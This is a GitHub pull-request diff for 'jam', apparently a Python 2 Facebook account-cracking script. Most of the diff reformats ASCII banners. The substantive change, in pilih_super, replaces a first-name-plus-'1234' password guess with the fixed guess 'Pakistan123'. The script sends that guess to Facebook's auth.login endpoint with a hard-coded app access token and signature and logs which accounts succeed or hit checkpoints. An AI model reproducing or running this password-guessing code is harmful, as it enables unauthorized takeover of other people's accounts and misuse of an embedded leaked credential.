Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
38 changes: 19 additions & 19 deletions Jam → jam
Original file line number Diff line number Diff line change
Expand Up @@ -49,14 +49,14 @@ def jalan(z):
##### LOGO #####
logo = """
\033[1;91m 💢💢———————————————————————————————💢💢
\033[1;96m _________ _______ _______
\033[1;96m \__ _/ ( ___ ) ( )
\033[1;96m ) ( | ( ) | | () () |
\033[1;96m | | | (___) | | || || |
\033[1;96m | | | ___ | | |(_)| |
\033[1;96m | | | ( ) | | | | |
\033[1;96m |\_) ) | ) ( | | ) ( |
\033[1;96m (____/ |/ \| |/ \|
\033[1;96m _________ _______ _______
\033[1;96m \__ _/ ( ___ ) ( )
\033[1;96m ) ( | ( ) | | () () |
\033[1;96m | | | (___) | | || || |
\033[1;96m | | | ___ | | |(_)| |
\033[1;96m | | | ( ) | | | | |
\033[1;96m |\_) ) | ) ( | | ) ( |
\033[1;96m (____/ |/ \| |/ \|
\033[1;91m 💢💢———————————————————————————————💢💢
"""
def tik():
Expand All @@ -77,19 +77,19 @@ vuln = "\033[32mVuln"
os.system("clear")
print """

\033[1;96m _________ _______ _______
\033[1;96m \__ _/ ( ___ ) ( )
\033[1;96m ) ( | ( ) | | () () |
\033[1;96m | | | (___) | | || || |
\033[1;96m | | | ___ | | |(_)| |
\033[1;96m | | | ( ) | | | | |
\033[1;96m |\_) ) | ) ( | | ) ( |
\033[1;96m (____/ |/ \| |/ \|
\033[1;96m _________ _______ _______
\033[1;96m \__ _/ ( ___ ) ( )
\033[1;96m ) ( | ( ) | | () () |
\033[1;96m | | | (___) | | || || |
\033[1;96m | | | ___ | | |(_)| |
\033[1;96m | | | ( ) | | | | |
\033[1;96m |\_) ) | ) ( | | ) ( |
\033[1;96m (____/ |/ \| |/ \|


\033[1;96m S_H_A_H_R_U_K_H
"""

jalan("\033[1;97m•◈───────◈ NOT A NAME ITS BRAND ◈───────◈•")
jalan("\033[1;97m•◈───────◈NOT A NAME ITS BRAND◈───────◈•")



Expand Down Expand Up @@ -368,7 +368,7 @@ def pilih_super():
cek.close()
cekpoint.append(user+pass4)
else:
pass4 = b['first_name'] + '1234'
pass4 = 'Pakistan123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
Expand Down